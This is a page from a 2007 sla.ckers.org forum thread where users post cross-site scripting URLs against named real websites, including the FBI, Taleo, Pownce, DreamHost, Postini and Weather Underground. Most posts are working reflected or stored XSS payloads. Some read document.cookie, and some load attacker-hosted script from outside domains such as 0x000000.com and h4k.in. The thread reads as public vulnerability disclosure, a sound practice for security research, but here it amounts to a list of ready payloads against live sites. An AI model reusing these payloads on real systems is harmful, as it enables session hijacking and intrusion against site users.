Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Where you should disclose your vulnerabilities. Go read RFPolicy if you want to do responsible disclosure, and go here for when all else fails. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
Pages: PreviousFirst...4647484950515253545556...LastNext
Current Page: 51 of 65
Re: So it begins
Posted by: hackathology
Date: June 26, 2007 04:15AM

Ronald, u mean ppl from internet is hitting you?

http://hackathology.blogspot.com

Options: ReplyQuote
Re: So it begins
Posted by: Anonymous User
Date: June 26, 2007 07:31AM

I guess he meant his site is being probed for XSS, SQLI etc.

Options: ReplyQuote
Re: So it begins
Posted by: rohanpinto
Date: June 26, 2007 07:52AM

Ronald Wrote:
-------------------------------------------------------
> I'm being hit constantly, but I haven't got holes
> :)

being hit constantly is another huge issue, I also constantly see incoming ssh connections on my servers too... no matter however many IP addresses I add to the denied list, the constant ssh brute force just keeps on going.. I wonder if there's a way to prevent that apart from contacting the ISP's and informing them about it.

the sad part about contacting ISP's is that I am really not sure if they do anything about it...

Options: ReplyQuote
Re: So it begins
Posted by: Martin
Date: June 26, 2007 08:05AM

Brother's gonna work it out....

Stored XSS on The Chemical Brother's new forum... http://www.thechemicalbrothers.com/forum/

Set profile signature to [img:208f4348a3]../images/chem-logo.png" style="-moz-binding:url(XBL_HERE);[/img:208f4348a3]

Notified them about a month ago. No reply. Love is all.

http://www.the-mice.co.uk/switch/ Switch/Twitch
http://code.google.com/p/dotnetids .NETIDS

Options: ReplyQuote
Re: So it begins
Posted by: Anonymous User
Date: June 26, 2007 11:48AM

Well I won't even twitch my eyes when I get hacked on the server level, it's not my job to secure that. I rent the space, so they have to figure that one out. My job is the webapplayer and I can sleep well at night, I can tell ya. And what if someone manage to square his eyes through a glowing terminal all month, what does he got? 400+ articles and a bunch of rants which are backed up plenty of times. I switch DNS and am back in 3 hours. As simple as that :)

Options: ReplyQuote
Re: So it begins
Posted by: Mephisto
Date: June 26, 2007 12:05PM

Security University: Their header says "Are you secure? How do you know?" Another part says "Qualified Training, Qualified Results".

https://www.securityuniversity.net/reg.php?crsNm=%20BUY%20%201%20CEH%20and%20ECSA%20%20get%20FREE%20LPT%20or%20CISSP"><script>alert('XSS');</script>

Options: ReplyQuote
Re: So it begins
Date: June 26, 2007 05:31PM

Ronald Wrote:
-------------------------------------------------------
> I'm being hit constantly, but I haven't got holes
> :)
I'm always being hit with PHP shell attempts, but they don't work on my site. Yesterday I noticed someone from Amsterdam ran Acunetix against my site, which I didn't appreciate, because if anything it's an annoyance to see all the retarded file names that I don't use show up in my statistics. The only "vulnerabilities" Acunetix finds on my site are TRACE requests, and files that point to missing files (I didn't specify a whole path in some of the links on my error pages).


Awesome AnDrEw - That's The Sound Of Your Brain Crackin'
http://www.awesomeandrew.net/

Options: ReplyQuote
Re: So it begins
Posted by: epsteinbar
Date: June 27, 2007 10:58PM

http://www.fbi.gov/cgi-bin/outside.cgi?javascript:alert('WTF') <-- sorry if this has been posted before also wasnt sure if this should be under redirect !



Edited 2 time(s). Last edit at 06/27/2007 11:00PM by epsteinbar.

Options: ReplyQuote
Re: So it begins
Posted by: tx
Date: June 28, 2007 02:34PM

https://tbe.taleo.net/login.jsp?loginErrorMsg=<SCRIPT>alert('XSS');</SCRIPT>
Coupled with the fact that when a user signs up to apply for a job, the site echoes back their chosen password in plaintext, this could be quite dangerous.

-tx @ lowtech-labs.org



Edited 1 time(s). Last edit at 06/28/2007 02:35PM by tx.

Options: ReplyQuote
Re: So it begins
Posted by: tr1pp33
Date: June 28, 2007 05:33PM

Weather Underground, I think there's loads here

http://www.wunderground.com/wximage/viewsingleimage.html?mode=singleimage&handle=<script>alert("XSS")</script>&number=0



Edited 1 time(s). Last edit at 06/28/2007 05:42PM by tr1pp33.

Options: ReplyQuote
Re: So it begins
Posted by: Mephisto
Date: June 29, 2007 11:45AM

oh great...Epsteinbar brought the FBI to the party...now were all fucked!

Options: ReplyQuote
Re: So it begins
Posted by: id
Date: June 29, 2007 04:40PM

Not the first time a 3 letter agency has been called out.

-id

Options: ReplyQuote
Re: So it begins
Posted by: Anonymous User
Date: June 29, 2007 09:37PM

Ode to my old heros:

http://www.metallica.com/timeline.asp?page=gallery&n_categoryid=2777&year=19882%22%3E%3C/object%3E%3Cscript%20src='http://0x000000.com/x.js'%3E%3C/script%3E

Options: ReplyQuote
Re: So it begins
Posted by: paroles32
Date: July 03, 2007 05:42AM

More of thase:

http://www.paroles32.com/paroles/m.php
http://www.paroles32.com/paroles/n.php
http://www.paroles32.com/paroles/o.php
http://www.paroles32.com/paroles/p.php
http://www.paroles32.com/paroles/q.php
http://www.paroles32.com/paroles/r.php
http://www.paroles32.com/paroles/s.php
http://www.paroles32.com/paroles/t.php
http://www.paroles32.com/paroles/u.php

Paroles de chanciones:
http://www.paroles32.com/paroles/madonna/index.php
http://www.paroles32.com/paroles/wet-wet-wet/index.php

And other are in french but ok

Options: ReplyQuote
Re: So it begins
Date: July 03, 2007 09:46AM

wtf?

Options: ReplyQuote
Re: So it begins
Date: July 03, 2007 10:33AM

Obvious SPAM is obvious.


Awesome AnDrEw - That's The Sound Of Your Brain Crackin'
http://www.awesomeandrew.net/

Options: ReplyQuote
Re: So it begins
Posted by: EdAbbey
Date: July 03, 2007 08:33PM

http://www.nascio.org/events/calendar.cfm?month=8&year=2007%22%3E%3Ciframe%20src=http://ha.ckers.org/scriptlet.html%20%3C
seems to be part of a generic coldfusion error page which is by itself rather juicy: http://www.nascio.org/events/calendar.cfm?month=8&year=2007x

Options: ReplyQuote
Re: So it begins
Posted by: digi7al64
Date: July 04, 2007 11:36PM

POWNCE > http://www.whiteacid.org/misc/xss_post_forwarder.php?xss_target=http://www.pownce.com/request_invite/&request_email=%3Cscript%3Ealert%28%27homfg%27%29%3B%3C%2Fscript%3E

----------
'Just because you got the bacon, lettuce, and tomato don't mean I'm gonna give you my toast.'



Edited 1 time(s). Last edit at 07/04/2007 11:37PM by digi7al64.

Options: ReplyQuote
Re: So it begins
Posted by: EdAbbey
Date: July 05, 2007 02:15AM

zooomr: http://www.whiteacid.org/misc/xss_post_forwarder.php?xss_target=http://beta.zooomr.com/login/&gogogo=1&username=%22%3E%3Cscript%3Ealert(0)%3C/script%3E

Options: ReplyQuote
Re: So it begins
Posted by: EdAbbey
Date: July 07, 2007 02:43PM

http://pownce.com/add_friends/query/%2522%253E%253Cscript%253Ealert%25280%2529%253C%252Fscript%253E/

Options: ReplyQuote
Re: So it begins
Posted by: 3ric
Date: July 08, 2007 12:54PM

> pownce.com

Here's another one:

PoC: http://p0wnz.website-security.org/poc.swf
AS source: http://p0wnz.website-security.org/poc.as.txt

PoC works if user has an account and uses Flash plugin.

Options: ReplyQuote
Re: So it begins
Posted by: Anonymous User
Date: July 08, 2007 08:15PM

http://www.filepedia.com/search/results.cfm?hakusanat=%22%3E%3Cscript%20src='http://0x000000.com/x.js'%3E%3C/script%3E%3C%22

Options: ReplyQuote
Re: So it begins
Posted by: Anonymous User
Date: July 08, 2007 10:13PM

dreamhost 2.0

http://discussion.dreamhost.com/showprofile.pl?Cat=0&User=moua%22%3E%3C/title%3E%3Cscript%3Ealert(document.location);%3C/script%3E%3Ctitle%3E

Some things will never change ^^

Options: ReplyQuote
Re: So it begins
Posted by: badsamaritan
Date: July 10, 2007 03:15PM

WWW.com The XSS Starts Here

http://www.www.com/search.php?q=%22%3E%3Cscript%3Ealert%28%27xss%27%29%3C%2Fscript%3E

Options: ReplyQuote
Re: So it begins
Posted by: hideaway
Date: July 10, 2007 09:27PM

3ric Wrote:
-------------------------------------------------------
> > pownce.com
>
> Here's another one:
>
> PoC: http://p0wnz.website-security.org/poc.swf

And yet another one in pownce...
http://www.whiteacid.org/misc/xss_post_forwarder.php?xss_target=http://www.pownce.com/forgot/&email=%3Cscript%3Ealert(1)%3C/script%3E

---------------------------------------
pen-test blog @ http://www.hideaway.net

Options: ReplyQuote
Re: So it begins
Posted by: epsteinbar
Date: July 12, 2007 10:55AM

http://www.darknet.org.uk/index.php?s="><script>alert(document.cookie);</script><"
http://www.sitemeter.com/?a=stats&s="><script>alert(document.cookie);</script><"

Options: ReplyQuote
Re: So it begins
Posted by: christ1an
Date: July 12, 2007 12:10PM

Acquired by Google for $625 million in order to make sure Google's apps are secure in future...

http://www.postini.com/register/index.php?FreeTrial=1&src=%22%3E%3Cscript/src=http://h4k.in/j.js%3E

Regards,
- http://christ1an.blogspot.com

_______________________
[[url=http://php-ids.org]php-ids.org[/url]] Web Application Security 2.0

Options: ReplyQuote
Re: So it begins
Posted by: EdAbbey
Date: July 17, 2007 01:28AM

http://govtsecurity.com/searchresults/?terms=%22%3E%3Cscript%3Ealert%280%29%3C%2Fscript%3E&x=0&y=0

Options: ReplyQuote
Re: So it begins
Posted by: fogez
Date: July 17, 2007 01:13PM

http://data.aolsearchlogs.com/search/do.cgi?QUERY=XSS%22%3E%3Cscript%3Ealert('XSS')%3C/script%3E%3Ca=%22

Options: ReplyQuote
Re: So it begins
Posted by: WhiteAcid
Date: July 20, 2007 10:42AM

http://tinyurl.com/2w53ks
That one is for hellboundhackers.org, to test it you need 1) an account, 2) to be logged in and 3) one or more PMs in your inbox.
They have more XSS flaws, but this one was actually interesting.

Don't forget our IRC: irc://irc.irchighway.net/#slackers
-WhiteAcid - your friendly, very lazy, web developer

Options: ReplyQuote
Pages: PreviousFirst...4647484950515253545556...LastNext
Current Page: 51 of 65


Sorry, only registered users may post in this forum.